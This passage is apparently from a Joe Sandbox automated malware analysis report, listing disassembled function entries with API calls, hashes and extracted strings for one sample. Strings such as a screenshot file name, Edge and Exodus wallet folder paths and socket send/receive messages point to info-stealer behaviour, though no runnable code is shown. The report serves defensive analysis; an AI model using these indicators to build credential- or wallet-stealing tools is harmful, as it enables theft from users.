                    • GetProcAddress.KERNEL32(?,?,?,00007FF7F131C878,?,?,?,?,00007FF7F1318D31,?,?,?,?,00007FF7F12FB248), ref: 00007FF7F131BFB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProc
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3013587201-537541572
                    • Opcode ID: e867a896a585152ae45827db36ee331074f5c95efb8fb85160f6ba5156a0a05c
                    • Instruction ID: 93e631d18b9cc5902a8260bf08428e7b45462bf72a89736720c2ad243eec7847
                    • Opcode Fuzzy Hash: e867a896a585152ae45827db36ee331074f5c95efb8fb85160f6ba5156a0a05c
                    • Instruction Fuzzy Hash: 0F414722F0864283EB15EB169800575A3A1FF45BB0F86513DDD6DA77C8DFBDE40983A1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: a739afd6363db4907d837864cb59bc250a103b16810d7eec020c9d47b9a61ea7
                    • Instruction ID: 5dd18664521935f94ad1e3c4f932396c968270a0b269ee404225a8c0bb4ac642
                    • Opcode Fuzzy Hash: a739afd6363db4907d837864cb59bc250a103b16810d7eec020c9d47b9a61ea7
                    • Instruction Fuzzy Hash: DAC107A2D0C79683EB206B5594402BDBB91EF80BA0FD64138D96E133D1DFFCE44583A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorIoctlLastsendsetsockopt
                    • String ID: Send failure: %s$send(len=%zu) -> %d, err=%d
                    • API String ID: 2224487826-343019339
                    • Opcode ID: 194f35ccac99204ccc3451a83f7b647ae1ba871b9da5a4ebe47e6d78843a4199
                    • Instruction ID: 551c8a6e1a519f087f7a22a073dda30575ff713ca040aac540468d8faecb0562
                    • Opcode Fuzzy Hash: 194f35ccac99204ccc3451a83f7b647ae1ba871b9da5a4ebe47e6d78843a4199
                    • Instruction Fuzzy Hash: B651A372A08B8186E760DF69E5807AAB3A0FB88B94F404131DF9D47795EFBCD185CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: DirectoryInformationVolumeWindowswsprintf
                    • String ID: %08lX%04lX%lu$QuBi
                    • API String ID: 3001812590-333039331
                    • Opcode ID: bc176afd4421eac289a9c25a97889cd52107ddcacc10b61251182c11cd72f80a
                    • Instruction ID: 8ff3539424f7c060cd2ca93e7c7fbd57bdb9b7768348c14fd645d2528d9b7a8a
                    • Opcode Fuzzy Hash: bc176afd4421eac289a9c25a97889cd52107ddcacc10b61251182c11cd72f80a
                    • Instruction Fuzzy Hash: 4621CE32608781CBD324CF78E85069ABBA5FB89748F54513AE79987A58DBBCC109CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: Recv failure: %s$recv(len=%zu) -> %d, err=%d
                    • API String ID: 2514157807-2495832097
                    • Opcode ID: 1978edd4556ee24776eb1c4539b2f314356fb78c9ed98667ec1acd288cacf739
                    • Instruction ID: 9a5d902e906681155f3c404b595345b76867add51d99396f096803b89607389a
                    • Opcode Fuzzy Hash: 1978edd4556ee24776eb1c4539b2f314356fb78c9ed98667ec1acd288cacf739
                    • Instruction Fuzzy Hash: 9A31C372B086818AE725EF56E8407A9B7A0BB4CBA4F404135DEAD477D1DF7CE041D790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$getsockname
                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                    • API String ID: 3066790409-2605427207
                    • Opcode ID: a203559e7605fe364c2675ff617f0913964b67004d2bfd3391f550fd369d091a
                    • Instruction ID: 6587070af1a2291af9d1aff73433f4c945ab85568e686f467ea62487321e3569
                    • Opcode Fuzzy Hash: a203559e7605fe364c2675ff617f0913964b67004d2bfd3391f550fd369d091a
                    • Instruction Fuzzy Hash: B131A722B187C282E720EB15D4003FEA350FB8D758F845235EAAC476D6DFACE5918B90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Gdip$AllocBitmapCreateFileFromImageSave
                    • String ID: \Screenshot.jpg
                    • API String ID: 2335731563-675533427
                    • Opcode ID: 7f7bc839ba2aaeb7887f169590bb99545f6d21552d0e7b74b191fd9de547f69f
                    • Instruction ID: d04332063d67c9095446881174ff85fb0b55386c27f887e66e28f6695062a00f
                    • Opcode Fuzzy Hash: 7f7bc839ba2aaeb7887f169590bb99545f6d21552d0e7b74b191fd9de547f69f
                    • Instruction Fuzzy Hash: 84213932B14B5596EB00EB61D8542AC77B5FB48F88F84803ACE1D53798DFB8D545C3A0
                    APIs
                      • Part of subcall function 00007FF7F12ED430: GetModuleHandleA.KERNEL32 ref: 00007FF7F12ED476
                      • Part of subcall function 00007FF7F12ED430: GetProcAddress.KERNEL32 ref: 00007FF7F12ED486
                      • Part of subcall function 00007FF7F12B3C80: GetModuleHandleA.KERNEL32(?,?,00000002,00007FF7F12ED8CB,?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12B3C94
                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12ED8E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                    • API String ID: 1646373207-3788156360
                    • Opcode ID: d9a435e6787294436ad44784e22c1c43c00c0275dd53161b871b8b12983e3b79
                    • Instruction ID: 19e448f3f1018ef6023b41545091f346c0358139cb51f9449c00c925159e3a52
                    • Opcode Fuzzy Hash: d9a435e6787294436ad44784e22c1c43c00c0275dd53161b871b8b12983e3b79
                    • Instruction Fuzzy Hash: A2014820B19B4682EF44EB59A8A1765A3A1BF48340FC8503DDA5D837D5FFBCE50887A0
                    APIs
                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1317803), ref: 00007FF7F1317934
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1317803), ref: 00007FF7F13179BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ConsoleErrorLastMode
                    • String ID:
                    • API String ID: 953036326-0
                    • Opcode ID: 927588212c4f7140c905eb9cffc910b3153872b2b5131b69c7bb0ca4a9e0dee2
                    • Instruction ID: 9212c0bf63c025c40adc6fb3b55c7402d8c00f99b81db4e71a30bc30c7938560
                    • Opcode Fuzzy Hash: 927588212c4f7140c905eb9cffc910b3153872b2b5131b69c7bb0ca4a9e0dee2
                    • Instruction Fuzzy Hash: 5F910722F0865186F750AF6584406BDABA0BF047A8F99413DDE6E377C6CFB8E446C360
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _get_daylight$_isindst
                    • String ID:
                    • API String ID: 4170891091-0
                    • Opcode ID: 872872aef99863ee478c3de1efa29fdc86b53772d35afb18ae57b287bcbb5de2
                    • Instruction ID: 3f452028464ff8cb113070e3d8589ff25680e83ee68a18845d62b1202231233c
                    • Opcode Fuzzy Hash: 872872aef99863ee478c3de1efa29fdc86b53772d35afb18ae57b287bcbb5de2
                    • Instruction Fuzzy Hash: 74512672F041128BEB18FB24D9956BCA7A1BF01378F91013DDD2E62AD5DB7CA402C750
                    APIs
                    • GetFileType.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F130330C), ref: 00007FF7F13036A7
                    • GetFileInformationByHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F130330C), ref: 00007FF7F1303709
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F130330C), ref: 00007FF7F130379B
                    • PeekNamedPipe.KERNEL32 ref: 00007FF7F13037E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 2780335769-0
                    • Opcode ID: 299048db424302d61068b2727f12977d3716de6ffb6747d422c7894533d9b74c
                    • Instruction ID: 8ca18c13d0c948701f387a368db1a96eb58505f471ae3f68feb0584ed80e72cb
                    • Opcode Fuzzy Hash: 299048db424302d61068b2727f12977d3716de6ffb6747d422c7894533d9b74c
                    • Instruction Fuzzy Hash: EC418B66E086418AFB10EFB1D4513BDA7E1BF48B5CF504539DE2D47689DFB8E48183A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1279662727-0
                    • Opcode ID: 5f94081f82086c0d0288e87be23f1403e51a12f95bff66429f7862373c8c3ded
                    • Instruction ID: 2b10c9b4eb4d36b67c0b4622f453c67c844a9e32f2e10d749a0113d9c7544bb5
                    • Opcode Fuzzy Hash: 5f94081f82086c0d0288e87be23f1403e51a12f95bff66429f7862373c8c3ded
                    • Instruction Fuzzy Hash: 11419062D18B818BE3549F309540369A3A0FF99758F509339EBAC03AD5EF7CE1A18790
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: GdiplusMetricsSystem$ShutdownStartup
                    • String ID:
                    • API String ID: 1537832493-0
                    • Opcode ID: d3adff0ba0cd22d04c99bd6e35e9e822ec9d3de7431347d6f95e856eb4d8d5e8
                    • Instruction ID: 842efe6030c522f160d4165c552bd36676032705ff450c9205033e39e330f1c7
                    • Opcode Fuzzy Hash: d3adff0ba0cd22d04c99bd6e35e9e822ec9d3de7431347d6f95e856eb4d8d5e8
                    • Instruction Fuzzy Hash: D8219A33B14A118AE710AF70D8443AD67B0FB48BADF94123ADE1D63A99DF78D4858790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CopyFilewsprintf
                    • String ID: %s\%s
                    • API String ID: 463280863-4073750446
                    • Opcode ID: e63c7138dbdfefb25e0694bb4cce5930fd43d03588db8c741460d8dda7bce9d6
                    • Instruction ID: e2199b060d038f8b55f1b1d7c817f83c5b8b81914e2b2b46e27d43ebed27608c
                    • Opcode Fuzzy Hash: e63c7138dbdfefb25e0694bb4cce5930fd43d03588db8c741460d8dda7bce9d6
                    • Instruction Fuzzy Hash: 8FF0A71271868692EB20AB11F9543AA9361FF48BC0FC98035DA6C47699DF7CD244C750
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                    • String ID:
                    • API String ID: 3251591375-0
                    • Opcode ID: 8734a954005d36adcbd41b79a72bffaa0f249be3d1877407a8cfa64c6e33a4c8
                    • Instruction ID: 550807f5ead9ccbfc94e6c8177097ca5cec18372a07aa605494c78c0260c0607
                    • Opcode Fuzzy Hash: 8734a954005d36adcbd41b79a72bffaa0f249be3d1877407a8cfa64c6e33a4c8
                    • Instruction Fuzzy Hash: D9315C25F0824386FB14B7A494223B99291AF45784FC54439E53D872D3DFEDB40882F0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastSleepgetsockopt
                    • String ID:
                    • API String ID: 3033474312-0
                    • Opcode ID: 187af71301877475cb9d0191c8dae17f6879211908ed9d5fa7c06ead14f62fff
                    • Instruction ID: 827a0f2ddf6b1eec146ff30d518ea42512283b39c4d9e90094eb7ece31f1aff7
                    • Opcode Fuzzy Hash: 187af71301877475cb9d0191c8dae17f6879211908ed9d5fa7c06ead14f62fff
                    • Instruction Fuzzy Hash: 64018432708A4283EB50EF5AE54423AE7A0EF49784F644035DAAD83BD4DFBDE448DB54
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ExclusiveLock$Release$Acquire
                    • String ID:
                    • API String ID: 1021914862-0
                    • Opcode ID: 5a3a22ac07b609585bd76cc359718e12eeed872fc36120eadf7476f6bb25145c
                    • Instruction ID: 103dc9dc562a9a75b0ea44da84fd88b3ff2861716d12e1fe65ac0637d78b6d23
                    • Opcode Fuzzy Hash: 5a3a22ac07b609585bd76cc359718e12eeed872fc36120eadf7476f6bb25145c
                    • Instruction Fuzzy Hash: 58F01720F18807D6EB14FB69DC96575A291BF94714FC00039D42EC22E4EFECE549E3A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CloseCreateErrorFileHandleLast
                    • String ID:
                    • API String ID: 2528220319-0
                    • Opcode ID: da8c1e7c2bedeec4287d7efc48ed0a0beeb5db5798330487481e790f59f59b7a
                    • Instruction ID: 52f99148aba7e0fb4742b5c662ae610a773bf29d3c71cf3574555e81468b8336
                    • Opcode Fuzzy Hash: da8c1e7c2bedeec4287d7efc48ed0a0beeb5db5798330487481e790f59f59b7a
                    • Instruction Fuzzy Hash: 61F0FE7AA1560587EB10AF10C54D36D36A0AB45B34FA0032CD7390B3E0CFBE654AA7E4
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: e61241e97333a41a25bdf127c6d78ffe4b4afa0527e86134b17f50a5464aaad9
                    • Instruction ID: a11429d9bbf725c3188e30801a35121a24bb543b6923d150af63e7cf6bae88c6
                    • Opcode Fuzzy Hash: e61241e97333a41a25bdf127c6d78ffe4b4afa0527e86134b17f50a5464aaad9
                    • Instruction Fuzzy Hash: 16D05E10F0820A83EB143B705C4507982116F68761F82143CD82B523D3DFACF40942E0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FolderPath_invalid_parameter_noinfo_noreturn
                    • String ID: Edge
                    • API String ID: 2457504600-3576986712
                    • Opcode ID: 6af5376d8284666509a39ac250658d98b0049f0fa58c2742334cf2119df5c520
                    • Instruction ID: 422a302bf6fd2beb9c00d23d419060b2e218460794d53f8f66328be298725c9f
                    • Opcode Fuzzy Hash: 6af5376d8284666509a39ac250658d98b0049f0fa58c2742334cf2119df5c520
                    • Instruction Fuzzy Hash: C351D062F14B469AE700EBB4D4401ECA372EF95388F905236EA5C6299ADF78E180C3D0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FolderPath_invalid_parameter_noinfo_noreturn
                    • String ID: Exodus
                    • API String ID: 2457504600-2418718958
                    • Opcode ID: 4c8f0d2490d29a433f996ffc5986f4a692f122b01e6baf9c58cd39e8dc5808cf
                    • Instruction ID: 1c5dea5c757f340ad5d1175824c4c849a5cd81e27dca2f0989d9feafd4d80d6c
                    • Opcode Fuzzy Hash: 4c8f0d2490d29a433f996ffc5986f4a692f122b01e6baf9c58cd39e8dc5808cf
                    • Instruction Fuzzy Hash: 3F41A172F14B469AE700EFB5D4401ECA371EF95348F805236EA6C53A99DF78E650C394
                    APIs
                    Memory Dump Source
